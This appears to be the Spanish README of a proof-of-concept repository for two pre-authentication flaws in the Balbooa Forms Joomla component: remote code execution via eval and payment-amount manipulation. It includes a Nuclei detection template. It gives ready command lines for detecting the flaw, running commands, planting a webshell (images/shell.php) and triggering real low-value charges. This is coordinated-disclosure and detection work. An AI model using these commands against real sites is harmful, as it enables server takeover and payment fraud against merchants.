
PoC y plantillas de detección para RCE sin autenticación y manipulación de pagos en Balbooa Forms (Joomla), incluyendo exploit en Python y plantilla de detección de Nuclei.
PoC y plantillas de detección para dos vulnerabilidades pre-autenticación en Balbooa Forms (com_baforms) para Joomla, corregidas en 2.4.3.2.
Descubiertas por Lulztigre, divulgación coordinada a través del Joomla Security Strike Team (JSST), publicadas el 2026-08-19. Informe completo: https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html
| Archivo | Propósito |
|---|
balbooa_forms_poc.py | PoC en Python, solo stdlib, cubre ambos CVEs |
CVE-2026-67364.yaml | Plantilla de Nuclei, detección no destructiva del RCE por eval |
Cero dependencias (Python 3.8+). Los modos rce y detect no escriben archivos ni realizan
cargos reales; shell y pay son opcionales y están pensados para uso en laboratorio.
# 1. Encontrar un par (form-id, submit-btn) vulnerable. No destructivo: cada sonda es una
# sumisión anónima con un payload de marcador de eco.
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10
# 2. Demostrar ejecución de comandos. La salida regresa en la respuesta HTTP, sin persistencia.
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id
# 3. Prueba clásica de webshell (solo laboratorio - escribe images/shell.php)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7
# 4. Manipulación del monto de pago (solo laboratorio - realiza intentos de cargo REALES; requiere --authorize)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01
Código de salida 0 = vulnerable/explotado, 1 = limpio o fallido, 2 = error de uso.
Notas:
[Parámetro de URL = X], y sin reCAPTCHA en el botón.--insecure omite la verificación TLS para objetivos HTTPS con certificados autofirmados.Solo detección: extrae el token CSRF anónimo, luego barre rangos pequeños de form/btn con un payload de marcador de eco y coincide el marcador en la respuesta. No escribe archivos, no realiza cargos reales.
nuclei -t CVE-2026-67364.yaml -u http://target -v
Verificada contra nuclei v3.11.1 (Windows + Linux): extracción de token, barrido de 30 pares
(form-id 1..3 x submit-btn 1..10, clusterbomb), 1 coincidencia crítica en el par vulnerable.
Añade -duc en equipos sin conexión para omitir la comprobación de actualizaciones. El barrido es deliberadamente
pequeño; aumenta los rangos de payload si un objetivo aloja más formularios. La manipulación de pagos (CVE-2026-67363)
NO está automatizada intencionalmente en nuclei: cada sonda es un intento de cargo real contra la
pasarela del comerciante.
Úsalo solo contra sistemas que estés autorizado a probar.